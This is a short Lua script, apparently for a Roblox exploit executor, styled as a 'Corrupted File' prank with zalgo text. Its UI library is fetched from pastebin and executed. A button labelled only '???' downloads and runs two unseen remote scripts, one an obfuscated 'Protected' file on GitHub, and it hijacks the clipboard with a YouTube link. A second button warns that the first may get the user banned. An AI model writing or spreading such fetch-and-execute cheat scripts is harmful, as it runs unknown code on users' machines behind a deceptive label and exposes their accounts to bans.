local Library = loadstring(game:HttpGet("https://pastebin.com/raw/vff1bQ9F"))()

local Window = Library.CreateLib("Corrupted File.lua", "BloodTheme")

-- Tabs

local Tab1 = Window:NewTab("Corrupted File")

-- Sections inside tabs

local Tab1Section = Tab1:NewSection("Ö̵̬̻̱̳͕̹̈́̀̒̀̂̃µ̴̡̩͕͙̺̥̋̇̈́̅͒̕†̸̧͖͔̗̞̇͆́̂̿͘ͅr̷̡̡̛̫͔̣̳̈́̇̀̈͠ạ̵̧̱̗̬͚̊̀̏͌͒̆̽g̸͙͓͇̲̫̙̈͐̓̅͘͝ề̵͍͓̹͔͇̙̂̆̎̚̚ð̸̡̣͎̱͚̊̿̍̏͜͠͠µ̵̲͇̖̜̫̊̋̐̾̅̃ͅ§̶̨͕̣̟͔̊̽̂͌̀̉ͅÐ̵̧͖̩̫̙͖͒͊̒̑͂͝ð̵͈̪̫͉̗̞̆͊̔͗̓͘m̴̲͈̪͎̠͇̐̉̿͋̿͝ï̷̧̖̳̥̯̜͂͐̏̏͌͠ñ̸̡̡̺͔̻̱̇̇̈̂͛͛å̸̼͍̮̫͚̜̃́̆̓̿͆ñ̸̡̢̪̯͇̙̏̏͗͂̅̈́¢̶̜̞̻̫̤͙͛̏͒͛̽̇ê̴̮̞̲̺̝̲̿́̏̌̾͑?̸̧͚̥͍͖͉̾̓̂̒̉͝ ̸̭͈̫̗͚̾̏̉̆̏̌͜Ì̵͔̙̟̟̜̥̈́̔̅̓̀́§̵̢̞̜̮̼̞͒͊̂̌̍̕ ̶͈͖͚̞͚̀̍̅̍̑͜͝†̵̨͈̰̬͎̍͐̌̈́̆̒ͅh̵̖̼̰̻̞̓͒̾̀́͜͠å̷̡̬͉̲̣̃̈́̊̽̈́̇ͅ†̷̙͎̱̳͍̝̌͗͛̈́͛̈́ ̷̙̩͇͎̠̙͑̅̋̀̆͠¥̷̗̭̣͈͙̘̿̈́̅̇́̇ð̶͕̲̟͖̤̋̎͛͂͝͝ͅµ̸̡̫̜͇͓͚̈̐͒̑͗̀?̶̈́̐")

local Tab1Section = Tab1:NewSection("Check The /console for a message")

-- Buttons

Tab1Section:NewButton("???", "???", function()

loadstring(game:HttpGet("https://pastebin.com/raw/KjTtCh5v"))();

 setclipboard("https://youtu.be/zWkaXxEfhlA")

 loadstring(game:HttpGet("https://raw.githubusercontent.com/iimateiYT/Scripts/main/Protected%20(30).lua", true))()

end)

Tab1Section:NewButton("Risk", "???", function()

 print("Youre Lucky If You Click This Button First. You Might Have Been Banned If You Click The First Button. Please Leave This Lua File Now. This Instance.")

end)
